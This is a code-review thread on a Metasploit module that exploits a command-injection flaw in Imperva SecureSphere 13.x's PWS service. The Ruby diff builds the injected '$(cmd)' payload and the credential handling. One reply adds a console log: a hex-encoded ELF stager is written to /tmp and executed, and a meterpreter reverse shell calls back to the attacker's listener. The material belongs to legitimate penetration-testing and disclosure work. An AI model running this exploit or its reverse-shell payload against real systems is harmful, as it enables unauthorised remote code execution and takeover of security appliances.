modules/exploits/linux/http/imperva_securesphere_exec.rb

```diff
@@ -0,0 +1,129 @@
+          This module exploits a command injection vulnerability in Imperva
+          SecureSphere 13.x. The vulnerability exists in the PWS service,
+          where Python CGIs didn't properly sanitize user supplied command
+          parameters and directly passes them to corresponding CLI utility,
+          leading to command injection. Agent registration credential is
+          required to exploit SecureSphere in gateway mode.
+
+          This module was successfully tested on Imperva SecureSphere 13.0/13.1/
+          13.2 in pre-ftl mode and unsealed gateway mode.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module
+          ],
+        'References'     =>
+          [
+            [ 'EDB', '45542' ]
+          ],
+        'DisclosureDate'  => "Oct 8 2018",
+        'Platform'        => 'linux',
+        'Arch'            => [ARCH_X86, ARCH_X64],
+        'CmdStagerFlavor' => %w{ echo printf wget },
+        'Targets'         =>
+          [
+            ['Imperva SecureSphere 13.0/13.1/13.2', {}]
+          ],
+        'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 443]),
+        OptBool.new('SSL', [false, 'Use SSL', true]),
+        OptString.new('USER', [false, 'Agent registration username', 'imperva']),
+        OptString.new('PASS', [false, 'Agent registration password', '']),
+        OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),
+        OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 3])
+      ])
+  end
+
+  def send_request(data)
+    req_params = {
+      'method'      => 'POST',
+      'uri'         => normalize_uri(target_uri.path),
+      'data'        => data.to_json
+    }
+
+    unless datastore['USER'].to_s.empty? or datastore['PASS'].to_s.empty?
+      unless defined? @cookie
+        res = send_request_cgi({
+          'method'      => 'GET',
+          'uri'         => normalize_uri('/')
+        })
+        @cookie = res.get_cookies
+      end
+
+      req_params['cookie'] = @cookie
+      req_params['headers'] = {
+        'Authorization' => 'Basic ' + Rex::Text.encode_base64(datastore['USER'] + ':' + datastore['PASS'])
+      }
+    end
+
+    send_request_cgi(req_params, datastore['TIMEOUT'])
+  end
+
+  def execute_command(cmd, opts = {})
+    data = {
+      'command'     => 'impctl server status',
+      'parameters'  => {
+        'broadcast'         => true,
+        'installer-address' => "127.0.0.1 $(#{cmd})"
+      }
+    }
+
+    begin
+      res = send_request data
+    rescue Rex::ConnectionError, Errno::ENOTCONN => e
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+    if res && res.code == 401
+      fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')
+    end
+    res
```

Comment:
Does the server return anything? Would it be useful to check the response code or response body to ensure everything is operating as intended?

Reply:
Added check for response code & keyword inside response body in case of successful command execution. Please let me know if that looks good.

Reply:
Thanks for the suggestion, after testing, I ran into issue with `linux/x64/meterpreter/reverse_tcp`, where the server side CGI wouldn't return and `res` would be `nil` when specified TIMEOUT is reached, even though the meterpreter session was successfully created in the background. 

Below is an example:
```
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit

[*] Started reverse TCP handler on 192.168.146.217:4444
[*] Sending payload linux/x64/meterpreter/reverse_tcp
[*] Generated command stager: ["echo -en \\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x02\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x3e\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x78\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x38\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x1d\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc2\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x6a\\\\x39\\\\x58\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x74\\\\x08\\\\x48\\\\x31\\\\xff\\\\x6a\\\\x3c\\\\x58\\\\x0f\\\\x05\\\\x6a\\\\x39\\\\x58\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x74\\\\x08\\\\x48\\\\x31\\\\xff\\\\x6a\\\\x3c\\\\x58\\\\x0f\\\\x05\\\\x48\\\\x31\\\\xff\\\\x6a\\\\x09\\\\x58\\\\x99\\\\xb6\\\\x10\\\\x48\\\\x89\\\\xd6\\\\x4d\\\\x31\\\\xc9\\\\x6a\\\\x22\\\\x41\\\\x5a\\\\xb2\\\\x07\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\x52\\\\x6a\\\\x0a\\\\x41\\\\x59\\\\x56\\\\x50\\\\x6a\\\\x29\\\\x58\\\\x99\\\\x6a\\\\x02\\\\x5f\\\\x6a\\\\x01\\\\x5e\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\x3b\\\\x48\\\\x97\\\\x48\\\\xb9\\\\x02\\\\x00\\\\x11\\\\x5c\\\\xc0\\\\xa8\\\\x92\\\\xd9\\\\x51\\\\x48\\\\x89\\\\xe6\\\\x6a\\\\x10\\\\x5a\\\\x6a\\\\x2a\\\\x58\\\\x0f\\\\x05\\\\x59\\\\x48\\\\x85\\\\xc0\\\\x79\\\\x25\\\\x49\\\\xff\\\\xc9\\\\x74\\\\x18\\\\x57\\\\x6a\\\\x23\\\\x58\\\\x6a\\\\x00\\\\x6a\\\\x05\\\\x48\\\\x89\\\\xe7\\\\x48\\\\x31\\\\xf6\\\\x0f\\\\x05\\\\x59\\\\x59\\\\x5f\\\\x48\\\\x85\\\\xc0\\\\x79\\\\xc7\\\\x6a\\\\x3c\\\\x58\\\\x6a\\\\x01\\\\x5f\\\\x0f\\\\x05\\\\x5e\\\\x5a\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\xef\\\\xff\\\\xe6>>/tmp/kgpQY ; chmod 777 /tmp/kgpQY ; /tmp/kgpQY ; rm -f /tmp/kgpQY"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 192.168.146.201
[-] Exploit aborted due to failure: unreachable: 192.168.146.201:443 - Could not connect to the web service
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/imperva_securesphere_exec) > show seInterrupt: use the 'exit' command to quit
msf5 exploit(linux/http/imperva_securesphere_exec) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                             Connection
  --  ----  ----                   -----------                                             ----------
  10        meterpreter x64/linux  uid=497, gid=497, euid=497, egid=497 @ 192.168.146.201  192.168.146.217:4444 -> 192.168.146.201:49434 (192.168.146.201)
```

Reply:
Thank, that looks good. The indentation has been fixed.